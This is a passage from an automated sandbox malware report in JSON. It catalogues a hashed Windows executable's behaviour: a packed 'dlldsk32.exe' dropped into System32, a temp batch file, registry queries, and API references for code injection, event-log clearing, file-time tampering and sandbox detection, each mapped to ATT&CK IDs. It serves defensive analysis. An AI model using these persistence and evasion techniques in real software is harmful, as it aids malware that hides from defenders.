\"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" trying to access non-existent file \"C:\\api-ms-win-downlevel-advapi32-l2-1-0.dll\"\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" trying to access non-existent file \"C:\\CRYPTBASE.dll\"\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" trying to access non-existent file \"C:\\PROPSYS.dll\"\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" trying to access non-existent file \"C:\\ntmarta.dll\"\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" trying to access non-existent file \"C:\\VERSION.DLL\"\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" trying to access non-existent file \"C:\\Windows\\System32\\DLLDSK32.EXE\"\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" trying to access non-existent file \"C:\\SECUR32.DLL\"\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-FIBERS-L1-1-1.DLL\"\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-LOCALIZATION-L1-2-1.DLL\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-264", "type": 6, "relevance": 3, "name": "Creates a thread in a self process", "description": "\"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" creates a thread in process \"-1\" (Handle: 4294967295)\n \"dlldsk32.exe\" creates a thread in process \"-1\" (Handle: 4294967295)", "origin": "API Call", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "string-310", "type": 2, "relevance": 1, "name": "Contains ability to load modules (API string)", "description": "Found reference to API \"LoadLibraryA\" (Indicator: \"LoadLibrary\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API \"LoadLibraryA\" (Indicator: \"LoadLibrary\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-243", "type": 6, "relevance": 1, "name": "Reads files", "description": "\"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" reads file \"c:\\0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\"\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" reads file \"c:\\windows\\system32\\dlldsk32.exe\"\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" reads file \"c:\\users\\%osuser%\\desktop\\desktop.ini\"\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" reads file \"c:\\users\\%osuser%\\searches\\desktop.ini\"\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" reads file \"c:\\users\\%osuser%\\videos\\desktop.ini\"\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" reads file \"c:\\users\\%osuser%\\pictures\\desktop.ini\"\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" reads file \"c:\\users\\%osuser%\\contacts\\desktop.ini\"\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" reads file \"c:\\users\\%osuser%\\favorites\\desktop.ini\"\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" reads file \"c:\\users\\%osuser%\\music\\desktop.ini\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-177", "type": 3, "relevance": 1, "name": "Opens registry keys", "description": "\"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SQMCLIENT\\WINDOWS\"; Key: \"\"; Value: \"\")\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK\\PARAMETERS\"; Key: \"\"; Value: \"\")\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP6\\PARAMETERS\\WINSOCK\"; Key: \"\"; Value: \"\")\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK\\SETUP MIGRATION\\PROVIDERS\"; Key: \"\"; Value: \"\")\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK\\SETUP MIGRATION\\PROVIDERS\\TCPIP6\"; Key: \"\"; Value: \"\")\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\CMF\\CONFIG\"; Key: \"\"; Value: \"\")\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\WINDOWS ERROR REPORTING\\WMR\"; Key: \"\"; Value: \"\")\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SETUP\"; Key: \"\"; Value: \"\")\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\"; Key: \"\"; Value: \"\")\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\"; Key: \"\"; Value: \"\")\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\\{DCBFAAC3-D863-11E7-B9FF-806E6F6E6963}\\\"; Key: \"\"; Value: \"\")\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\\{DCBFAAC4-D863-11E7-B9FF-806E6F6E6963}\\\"; Key: \"\"; Value: \"\")\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\\MACHINELANGUAGECONFIGURATION\"; Key: \"\"; Value: \"\")\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\MUI\\SETTINGS\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\sechost.dll\"\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" trying to touch file \"C:\\version.DLL\"\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" trying to touch file \"C:\\Windows\\system32\\version.DLL\"\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" trying to touch file \"C:\\Windows\\system32\\IMM32.DLL\"\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" trying to touch file \"C:\\Windows\\system32\\dlldsk32.exe\"\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" trying to touch file \"C:\\Secur32.dll\"\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" trying to touch file \"C:\\Windows\\system32\\Secur32.dll\"\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" trying to touch file \"C:\\SSPICLI.DLL\"\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" trying to touch file \"C:\\Windows\\system32\\SSPICLI.DLL\"\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" trying to touch file \"C:\\Windows\\Temp\\VxOle32.dll\"\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" trying to touch file \"C:\\FLTLIB.DLL\"\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" trying to touch file \"C:\\Windows\\system32\\FLTLIB.DLL\"\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-synch-l1-2-0.DLL\"\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" trying to touch file \"\\FileSystem\\Filters\\FltMgrMsg\"\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" trying to touch file \"C:\\Windows\\Temp\\VxSSL32.dll\"\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" trying to touch file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\"\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" trying to touch file \"C:\\api-ms-win-downlevel-advapi32-l2-1-0.dll\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-161", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (non-executable)", "description": "\"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" trying to access non-existent file \"C:\\0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe.Local\\\"\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\r2767.bat:Zone.Identifier\"\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" trying to access non-existent file \"C:\\0B84AEB616EBD3B443326C397A9B3841124298B9A87CE91CD802D84FC6826A16.EXE.LOCAL\"\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\r2767.bat:ZONE.IDENTIFIER\"\n \"cmd.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\r2767.bat\"\n \"cmd.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\R2767.BAT\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-242", "type": 6, "relevance": 1, "name": "Writes files", "description": "\"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" writes file \"c:\\windows\\system32\\dlldsk32.exe\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-55", "type": 6, "relevance": 7, "name": "Touches files in the Windows directory", "description": "\"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" touched file \"C:\\Windows\\system32\\dlldsk32.exe\"\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\counters.dat\"\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" touched file \"C:\\Windows\\System32\\dlldsk32.exe\"\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Caches\"\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" touched file \"%LOCALAPPDATA%\\Microsoft\\Windows\\Temporary Internet Files\\counters.dat\"\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" touched file \"%LOCALAPPDATA%\\Microsoft\\Windows\\Caches\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-16", "type": 6, "relevance": 1, "name": "Connects to LPC ports", "description": "\"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" connecting to \"\\ThemeApiPort\"", "origin": "API Call", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-0", "type": 8, "relevance": 3, "name": "Dropped files", "description": "\"dlldsk32.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- Location: [%WINDIR%\\System32\\dlldsk32.exe]- [targetUID: 00000000-00004816]\n \"r2767.bat\" has type \"DOS batch file ASCII text with CRLF line terminators\"- Location: [%TEMP%\\r2767.bat]- [targetUID: 00000000-00004816]\n \"DLLDSK32.EXE.67A9C384.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-172", "type": 3, "relevance": 1, "name": "Queries registry keys", "description": "\"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SQMCLIENT\\WINDOWS\"; Key: \"CEIPENABLE\"; Value: \"\")\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK\\PARAMETERS\"; Key: \"TRANSPORTS\"; Value: \"\")\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP6\\PARAMETERS\\WINSOCK\"; Key: \"MAPPING\"; Value: \"\")\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK\\SETUP MIGRATION\\PROVIDERS\\TCPIP6\"; Key: \"WINSOCK 2.0 PROVIDER ID\"; Value: \"\")\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP6\\PARAMETERS\\WINSOCK\"; Key: \"MINSOCKADDRLENGTH\"; Value: \"\")\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP6\\PARAMETERS\\WINSOCK\"; Key: \"MAXSOCKADDRLENGTH\"; Value: \"\")\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP6\\PARAMETERS\\WINSOCK\"; Key: \"USEDELAYEDACCEPTANCE\"; Value: \"\")\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP6\\PARAMETERS\\WINSOCK\"; Key: \"HELPERDLLNAME\"; Value: \"\")\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\CMF\\CONFIG\"; Key: \"SYSTEM\"; Value: \"\")\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\WINDOWS ERROR REPORTING\\WMR\"; Key: \"DISABLE\"; Value: \"\")\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SETUP\"; Key: \"SOURCEPATH\"; Value: \"\")\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\"; Key: \"DEVICEPATH\"; Value: \"\")\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\\{DCBFAAC3-D863-11E7-B9FF-806E6F6E6963}\"; Key: \"DATA\"; Value: \"\")\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\\{DCBFAAC3-D863-11E7-B9FF-806E6F6E6963}\"; Key: \"GENERATION\"; Value: \"\")\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\\{DCBFAAC4-D863-11E7-B9FF-806E6F6E6963}\"; Key: \"DATA\"; Value: \"\")\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\\{DCBFAAC4-D863-11E7-B9FF-806E6F6E6963}\"; Key: \"GENERATION\"; Value: \"\")\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\"; Key: \"PREFERREDUILANGUAGES\"; Value: \"\")\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\"; Key: \"MACHINEPREFERREDUILANGUAGES\"; Value: \"\")\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"PREFEREXTERNALMANIFEST\"; Value: \"\")\n \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"CWDILLEGALINDLLSEARCH\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "summary-29", "type": 15, "relevance": 1, "name": "Shows ability to use execution guardrails", "description": "The analysis shows indicators which can be used as execution guardrails to ensure that payload only executes against intended targets/system. Matched sigs: Able to identify virtual/sandbox environment\n Matched sigs: Able to identify virtual environment by using user activity (API string)\n Matched sigs: Contains ability to retrieve the time elapsed since the system was started (API string)\n Matched sigs: Able to identify virtual environment using sandbox registry", "origin": "Indicator Combinations", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "string-306", "type": 2, "relevance": 1, "name": "Contains ability to impersonate access tokens (API string)", "description": "Found reference to API \"OpenProcessToken\" (Indicator: \"OpenProcessToken\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API \"OpenProcessToken\" (Indicator: \"OpenProcessToken\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "string-192", "type": 2, "relevance": 1, "name": "Contains ability to modify system service (API string)", "description": "Found reference to API \"ControlService\" (Indicator: \"ControlService\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API \"ControlService\" (Indicator: \"ControlService\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "string-318", "type": 2, "relevance": 1, "name": "Contains ability to load/free library (API string)", "description": "Found reference to API \"LoadLibraryA\" (Indicator: \"LoadLibrary\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API \"LoadLibraryA\" (Indicator: \"LoadLibrary\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "string-304", "type": 2, "relevance": 1, "name": "Contains ability to modify registry key/value (API string)", "description": "Found reference to API \"RegSetValueExA\" (Indicator: \"RegSetValue\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API \"RegSetValueExA\" (Indicator: \"RegSetValue\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "string-211", "type": 2, "relevance": 1, "name": "Contains ability to delete all entries from an event log (API string)", "description": "Found reference to API \"ClearEventLogA\" (Indicator: \"ClearEventLog\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API \"ClearEventLogA\" (Indicator: \"ClearEventLog\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1070.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/001"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "string-544", "type": 2, "relevance": 1, "name": "Contains ability to open a service (API string)", "description": "Found reference to API \"OpenServiceA\" (Indicator: \"OpenService\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API \"OpenServiceA\" (Indicator: \"OpenService\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1569.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569/002"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "string-409", "type": 2, "relevance": 1, "name": "Contains ability to set file time (API string)", "description": "Found reference to API \"SetFileTime\" (Indicator: \"SetFileTime\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API \"SetFileTime\" (Indicator: \"SetFileTime\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "string-92", "type": 2, "relevance": 1, "name": "Contains ability to inject code into another process (API string)", "description": "Found reference to API \"CreateThread\" (Indicator: \"CreateThread\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API \"VirtualFree\" (Indicator: \"VirtualFree\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API \"VirtualAlloc\" (Indicator: \"VirtualAlloc\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API \"CreateThread\" (Indicator: \"CreateThread\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API \"VirtualAlloc\" (Indicator: \"VirtualAlloc\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")\n Found reference to API \"VirtualFree\" (Indicator: \"VirtualFree\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "string-145", "type": 2, "relevance": 1, "name": "Found virtual disk drive like strings", "description": "Found string - \\\\.\\NTICE; Source: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found string - \\\\.\\NTICE; Source: \"00000000-00004816.00000000.139125.00423000.00000040.mdmp\")\n Found string - \\\\.\\NTICE; Source: \"00000000-00005072.00000000.139289.00423000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "registry-179", "type": 3, "relevance": 1, "name": "Tries to map intranet network resources to internet zone", "description": "\"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET 